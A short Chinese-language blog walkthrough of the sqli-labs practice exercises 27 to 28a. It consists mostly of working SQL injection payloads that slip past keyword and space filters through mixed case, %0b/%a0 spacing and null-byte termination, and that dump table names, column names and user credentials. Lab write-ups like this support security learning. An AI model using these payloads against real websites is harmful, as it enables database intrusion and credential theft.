lesson27_28a

发表于 更新于 分类于

lesson27

QQ截图20220211160219.png

因为没有报错的回显所以我们采用联合查询

又因为select和union又被过滤,所以我们采用uNion和sElect

?id=11111’ %0b uNion %0b sElect %0b 1,2,3 ||’1’=’1

QQ截图20220211185056.png

?id=11111’ %0b uNion %0b sElect %0b 1,database(),3 ||’1’=’1

QQ截图20220211185216.png

?id=11111’ %0b uNion %0b sElect %0b 1,(sElect(group_concat(table_name))from(information_schema.tables)where(table_schema=’security’)),3 ||’1’=’1

QQ截图20220211185630.png

?id=11111’ %0b uNion %0b sElect %0b 1,(sElect(group_concat(column_name))from(information_schema.columns)where(table_name=’users’)),3 ||’1’=’1

QQ截图20220211185828.png

?id=11111’ %0b uNion %0b sElect %0b 1,(sElect(group_concat(concat_ws(0x7e,username,password)))from(security.users)),3 ||’1’=’1

QQ截图20220211190332.png

lesson27a

lesson27a是相同的方法,和lesson27一样

主要是空格用%a0或者%0b来代替

lesson 28

http://sqli-labs/Less-28/?id=1')||('1')=(‘1

是(’’)的包裹方式

我这里采用盲注来做,但是很多师傅的参考都是用联合查询来做的,我的sql-liblesson28抽风了,空格老是被注释了

?id=0’)||left(database(),2)=’se’;%00

QQ截图20220212184908.png

盲注爆出库,表,列

lesson 28a

同样的payload,lesson28也可以做,所以跳过了